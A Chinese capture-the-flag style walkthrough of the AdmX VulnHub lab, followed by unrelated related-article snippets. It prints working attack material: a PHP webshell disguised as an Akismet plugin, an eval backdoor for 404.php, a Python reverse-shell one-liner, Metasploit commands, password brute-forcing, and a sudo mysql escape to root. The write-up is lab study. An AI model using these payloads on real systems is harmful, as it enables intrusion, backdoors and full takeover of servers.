草庐IT

第七次打靶

我想对你说 2023-03-28 原文

靶机介绍

1)靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z

2)靶机难度:中

3)打靶目标: 取得 2 个 flag + root 权限

4)涉及攻击方法:主机发现、端口扫描、WEB路径爆破、BurpSuite内容替换、密码爆破、MSF漏洞利用、Wordpress后台漏洞利用、升级Full TTY终端、蚁剑上线、利用MySQL提权

5)课程来源:https://www.aqniukt.com/goods/show/2434?targetId=16289&preview=0

打靶过程

1)主机发现:通过nmap -sn ping扫描进行主机发现

# nmap -sn 192.168.56.0/24

2)端口扫描:对主机进行全端口扫描,发现该主机开放的端口

# nmap -p- 192.168.56.111

3)对发现的80端口进行服务版本扫描,发现确实是一个apache httpd服务

# nmap -p80 -sV 192.168.56.111

4)在浏览器直接对页面进行访问:发现只是一个默认的apache起始页面,该页面并没有发现其他更有价值的信息

浏览器:http://192.168.56.111/

5)对目标靶机进行web路径发现:本次使用feroxbuster工具(和dirsearch原理一直,但效果不同),默认情况下kali并未安装该工具

①feroxbuster安装

# apt install feroxbuster

②对目标主机进行路径发现

#feroxbuster --url http://192.168.56.111

注:默认情况下feroxbuster使用的字典是seclists,如果没有安装seclists字典,需要安装该字典

#apt install seclists

③除了使用默认的seclists字典外,也可使用其他的字典,如dirb工具下的common.txt字典

# feroxbuster --url http://192.168.56.111 -w /usr/share/dirb/wordlists/common.txt 

通过扫描发现了wordpress目录

6)对如下扫描到的路径进行访问

浏览器:http://192.168.56.111/wordpress/

①经过了很长时间,一个页面的内容还没有完整的加载上来,这个页面中到底加载了哪些元素,是哪些元素的加载缓慢,导致了整个页面的加载缓慢,此时通过burp查看整个界面的加载过程

查看到在页面请求过程中,主页面又向服务器请求了192.168.158.145上面的一部分资源,因此时主机和该IP不处于同一个地址段,所以192.168.158.145上的资源无法正常请求,导致页面加载缓慢

7)因192.168.158.145是目标服务端给客户端返回的数据包中硬编码写入的内容,所以在burp上设置:凡是服务端返回的数据包中,如果包含192.168.158.145这个就地址,就强制替换为192.168.56.111

①先修改相应数据包的响应头部分

②再修改相应数据包的相应体部分

③完成之后,重新访问页面,页面加载正常

8)对上述页面进行测试后,未发现任何的漏洞,包括wordpress版本漏洞等。根据前面对网站路径扫描,发现了类似的后台地址,对其进行访问

浏览器:http://192.168.56.111/wordpress/wp-admin/

9)对该后台进行密码暴力破解,先通过搜索发现wordpress该CMS的web应用后台管理员账号为admin(面对一个CMS时,先判断是哪种CMS,搜索该CMS有无默认的管理员账号)

①暴力破解时,字典使用提前下载好的mimipwds.txt

字典下载地址:https://github.com/dictest/subdic/tree/ddc8b5dc82750093b6763d9d064bb7d99aa1f425

②破解完成后,发现等使用adam14密码时,页面返回了不同的URL

③通过账号密码正确登陆至系统后台

10)wordpress常见提权方式

①media中如果wordpress版本较低,可以直接在其中上传webshell

②可在Appearance中的Theme Editor的外观主题的PHP源码进行编辑,如可将一句话木马写入外观代码404.php中,如果运气好,可直接使用蚁剑连接。此处该方式失败

③通过查看插件Plugins,或者手动编写并,上传一个插件,

A:编写插件:必须要写插件的头部信息

# cat webshell.php 
<?php
/**
Plugin Name: Webshell
Plugin URI: https://akismet.com/
Description: wp webshell for Pentest
Version: 1.0
Author: Automattic
Author URI: https://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
 */

if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?> 


B:将该webshell.php打包成zip压缩包格式

# zip shell.zip webshell.php
# ls shell.zip 

C:将shell.zip文件进行上传

D:上传成功后,进行激活引擎

E:访问上传的引擎,执行webshell,执行系统命令,发现正常执行

http://192.168.56.111/wordpress/wp-content/plugins/shell.php?cmd=id

11)使用上传的webshell进行反弹shell连接

①先确定目标服务器有无nc命令

http://192.168.56.111/wordpress/wp-content/plugins/shell.php?cmd=which nc

②本次打靶,使用python进行反弹shell,所以先确定目标主机有无python程序

http://192.168.56.111/wordpress/wp-content/plugins/shell.php?cmd=which python3

③python反弹shell代码

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.103",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Kali监听:
# nc -lvvp 4444
浏览器
http://192.168.56.111/wordpress/wp-content/plugins/shell.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.103",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

12)通过MSF获取shell

①启动MSF

# msfdb run

②查找wordpress后台相关的漏洞利用模块

msf6 > search wordpress admin
msf6 >use exploit/unix/webapp/wp_admin_shell_upload 
> set PASSWORD adam14
> set RHOSTS 192.168.56.111
> set TARGETURI /wordpress
> set USERNAME admin
> run

13)通过python反弹的shell,无法使用vi等命令对文本文件进行编辑,此时需要将shell升级成功能完整的、可以实现交互式的shell(此shell升级只适用于BASH)

①先将kali主机的解释器修改为BASH,先查看当前kali的解释器是否为BASH,若不是需要修改为BASH

# echo $SHELL
# chsh -s /bin/bash             #修改解释器为BASH
# reboot  					   #修改完成后需要重启

②将当前shell升级为完整的shell终端

CTRL+Z
#stty raw -echo
#fg
#ls
#export SHELL=/bin/bash
#export TERM=screen
#stty rows 38 columns 116
#reset

14)升级完成后,即可通过vi编辑器,完整的编辑文件(此处向之前添加为成功的404.php中,写入一句话木马)

#cd ./wordpress/wp-content/themes/twentytwentyone
#vi 404.php
eval($_POST['cmd']);

15)通过蚁剑连接webshell

注:渗透测试过程中,最好应该获取到目标系统的2-3个shell,防止某些系统触发某个漏洞获取到反弹shell后,环境发送了变化,导致无法使用同一个漏洞进行反弹shell。获取一个shell后,借助该shell获取到其他shell

16)信息搜集:在用户文件中发现了一个可以登录的wpadmin账号,在该用户家目录下,获取到了一个local.txt,但是只有wpadmin用户具备读权限,且查看系统内核版本、sudo权限,均不能进行提权

$cat /etc/passwd |grep /bin/bash
$cd /home/wpadmin
$ls -l local.txt
$ uname -a
$ sudo -l

17)信息搜集:发现了wordpress应用程序的配置文件,通过配置文件查看到了连接数据库的用户名和密码

cat /var/www/html/wordpress/wp-config.php

18)尝试通过发现的密码,使用wpadmin用户去登录操作系统,发现无法正常登录成功

$ su wpadmin

19)利用用户名和密码直接进行mysql数据库的登录,发现仍然无法正常登录成功

$ mysql -u admin -p Wp_Admin#123 -D wordpress

20)通过之前的信息搜集,发现在web界面,有一个adam14的密码,通过该密码对系统用户wpadmin进行登录,发现正确却换到了用户wpadmin,获取到了第一个flag

$ su - wpadmin
$ ls7
$ cat local.txt 

21)此时信息搜集,发现该用户wpadmin具有sudo权限:不使用密码的情况下即可使用mysql命令

$ sudo -l

22)通过mysql登录数据库,密码尝试使用adam14时,正确登录至数据库中

$ sudo /usr/bin/mysql -u root -D wordpress -p

23)通过在mysql数据库中执行system命令(简写/!),获取root权限

> system id
> \! /bin/bash
#cd
#cat proof.txt

总结:先对目标靶机进行了主机发现和端口扫描,扫描过程中只发现了80端口,通过端口访问到web页面后未发现其他有用漏洞信息,于是对web页面进行了路径发现,发现目标主机上存在一个wordpress的web应用,然后对其进行访问,访问过程中发现页面访问速度特别缓慢,所以开始怀疑是否页面有部分资源请求不到,导致整体的页面加载速度减慢,于是通过burp抓取了整个页面请求过程中的请求信息,于是发现该页面上通过硬编码的方式写死了部分IP地址,于是利用burp的匹配及替换功能,将硬编码写死的IP地址修改为了目标主机IP地址,从而解决页面加载慢的问题,从而可以正常访问到靶机web应用的后台地址,进而利用burp的暴力破解功能,获取到了web后台的密码,正确登入至后台管理界面。在后台管理界面通过了常见的wordpress后台漏洞利用方法(三种),最后使用插件的方式上传了webshell,获取到了反弹的shell,并利用反弹shell进行更新升级,使其成一个具有交互式功能的完整功能shell,利用完整功能的shell,修改了404.php,使得蚁剑可以正常上线。最后通过mysql数据库自身具备的system命令进行了提权(目标靶机上的sudo权限配置不当导致)操作。

有关第七次打靶的更多相关文章

  1. sqli-labs基础篇【第七关】详细解析 - 2

    Ⅰ验证是否注入点  从下面的注入测试来看,只有两种输出结果  如果sql执行了,就会输出“Youarein…Useoutfile…”,反之输入“YouhaveanerrorinyourSQLsyntax”?id=1--+--Youarein....Useoutfile......?id=1'--+--YouhaveanerrorinyourSQLsyntax?id=-1'--+--YouhaveanerrorinyourSQLsyntax?id=1\--+--Youarein....Useoutfile......查看是否存在双引号注入正常输出,说明有执行,存在双引号注入?id=1"--+--

  2. 动力节点Vue笔记第七章 - 2

    7Vue37.1了解Vue3vue3官网地址https://cn.vuejs.org/vue3发布时间2020年9月18日。翻译:今天,我们很自豪地宣布Vue.js3.0“海贼王”正式发布。这个新的主要版本的框架提供了改进的性能、更小的捆绑包大小、更好的TypeScript集成、用于处理大规模用例的新API,以及为框架未来的长期迭代奠定了坚实的基础。3.0版本代表了两年多的开发工作,包括30多个RFC、2600多个提交、来自99个贡献者的628个拉取请求,以及核心回购之外的大量开发和文档工作。我们要向我们的团队成员表示最深切的感谢,感谢他们接受了这一挑战,感谢我们提出的撤回请求,感谢我们的赞助

  3. 无线传感器网络的路由协议|第七章|12月7日|12月14日 - 2

    7.3层次路由协议7.3.1LEACH低功耗自适应聚类分级LEACH协议(LOW Energy Adaptive Clustering Hierarchy)是无线传感器网络中最早提出的分层路由算法。LEACH可以将网络整体生存时间延长15%,其基本思想是通过随机循环地选择簇头节点将整个网络的能量负载平均分配到每个传感器节点中,从而降低网络能源消耗,提高网络整体生存时间。7.3.2PEGASIS高效能采集传感器信息系统PEGASIS协议(Power Efficient Gathering in Sensor Information Systems)是在LEACH协议基础上提出的一种改进的路由算法

  4. 《图解TCP/IP》阅读笔记(第七章 7.1、7.2、7.3)—— 路由控制概念与路由控制算法 - 2

    第七章路由协议本章旨在将详细介绍路由控制以及实现路由控制功能的相关协议7.1路由控制的定义在互联网这片汪洋大海中,数据就好似一叶扁舟,没有灯塔的指引,是难以寻得目的地的。这种进行正确方向引导的转发数据的处理,就叫做路由控制或路由。路由器根据路由控制表转发数据包,具体则是依赖于数据包中目标主机的IP地址与路由器控制表比较得出下一个应该接收的路由器。所以,路由控制表的正确性,就相当重要了。那么,是谁,又是怎样制作和管理路由控制表的呢?实际上,路由控制表分为静态和动态两种类型。静态路由指事先设置好路由器和主机中的路由信息且固定住的一种方法。动态路由则是指让路由协议在运行过程中自动设置路由控制信息的一

  5. 【Love2d从青铜到王者】第七篇:Love2d之对象 - 2

    系列文章目录文章目录系列文章目录前言🍇一、Tables表格1️⃣.Tables表格🍈二、再来一次(Onemoretime)🍉三、函数(Functions)🍑四、总结🍋总结前言🍇一、Tables表格1️⃣.Tables表格在上一篇文章中,我们使用表格作为编号列表,但是我们也可以用不同的方式存储值:用字符串。functionlove.load()rect={}rect["width"]=100endfunctionlove.update(dt)endfunctionlove.draw()love.graphics.print(rect["width"],100,100)end“width”在这种情

  6. 贯穿设计模式第七话--接口隔离原则 - 2

    🥳🥳🥳茫茫人海千千万万,感谢这一刻你看到了我的文章,感谢观赏,大家好呀,我是最爱吃鱼罐头,大家可以叫鱼罐头呦~🥳🥳🥳从今天开始,将开启一个专栏,【贯穿设计模式】,设计模式是对软件设计中普遍存在(反复出现)的各种问题,所提出的解决方案,是一套被反复使用、多数人知晓的、经过分类编目的、代码设计经验的总结。为了能更好的设计出优雅的代码,为了能更好的提升自己的编程水准,为了能够更好的理解诸多技术的底层源码,设计模式就是基石,万丈高楼平地起,一砖一瓦皆根基。✨✨欢迎订阅本专栏✨✨🥺本人不才,如果文章知识点有缺漏、错误的地方🧐,也欢迎各位人才们评论批评指正!和大家一起学习,一起进步!👀❤️愿自己还有你在未

  7. 第七期 | 网约车司机的“捞偏门”手段:作弊抢单、空跑刷单 - 2

    顶象防御云业务安全情报中心监测到,多个网约车出行平台存在作弊软件抢单、空跑刷单等欺诈行为,不仅损害乘客利益,更严重影响平台正常运营。据顶象防御云业务安全情报BSL-2022-a3c7号显示,部分网约车平台上的司机与黑灰产勾结,通过作弊工具,截取长距离的订单,造成大量短路线的订单无人接。同时部分车主利用软件模拟行程“空跑刷单”,骗取平台的任务完成奖励,获取虚假订单的评分。网约车飞速发展的10年网约车是绿色出行的模式,提供专车、快车、出租车、顺风车四类服务模式。在为人们提供了便捷高效的本地交通服务,有效提升城市服务服务水平,有效减少碳排放,符合碳达峰、碳中和远景目标。网约车伴随移动互联网和云计算普

  8. 云计算技术与应用课后答案第七章 - 2

    第七章云技术1、下列设备(或资源)可以成为虚拟内容的是:(ABCD)A、CPUB、内存C、存储D、网络2、下列不属于虚拟化技术所具备的优势的是:(D)A、资源共享B、负载动态优化C、节能环保D、人工管理3、(B)年,IBM公司发布的IBM7044被认为是最早在商业系统上实现虚拟化。A、1959年B、1965年C、1999年D、2007年4、在X86平台上推出了可以流畅运行的商业虚拟化软件,推动虚拟化技术走进PC和服务器世界之中的虚拟化厂商是:(A)A、VMwareB、MicrosoftC、CitrixD、Redhat5、下列描述中不属于寄居虚拟化架构的特点的是:©A、硬件兼容性好B、对物理硬件

  9. 算法训练营第七天 - 2

    第454题.四数相加II算法思想因为是四个数组,因此不需要考虑类似单个数组内的重复情况,只需要将前两个数组用笛卡尔积排列出所有可能性,再用hashmap记录前两个数组的所有的和的次数。再排列出后两个数组所有和的可能性,如果和hashmap的键值和为零,则计数+1注意点和易错点最后count+=haspmap[key],而不是+=1TODO代码count=0hashmap=dict()fornum1innums1:fornum2innums2:ifnum1+num2notinhashmap:hashmap[num1+num2]=1else:hashmap[num1+num2]+=1fornum3

  10. 助力研发效能变革,第七届Techo TVP 开发者峰会圆满落下帷幕 - 2

    引言在互联网数字企业结束“野蛮扩张”、追求高质量增长的今天,研发效能已然成为企业关注的核心命题。伴随着云原生概念在软件领域的落地生根,云原生正驱动软件应用设计、实现、部署及运维方式的巨变,为研发效能治理带来了新的挑战与机遇,软件效能将迎来全新的云原生变革时代。2023年3月25日,TechoTVP开发者峰会“以云为核,效能聚变”正式落下帷幕,11位来自效能领域的知名技术领袖和专家,从效能治理、云原生、DevOps、可观测性等方面探讨了研发效能提升的最佳实践和未来趋势。主持人开场本次峰会由乐凯撒CTO、腾讯云TVP黄道泳担任主持人。会议一开始,黄老师首先分享了TechoTVP开发者峰会的初心和宗

随机推荐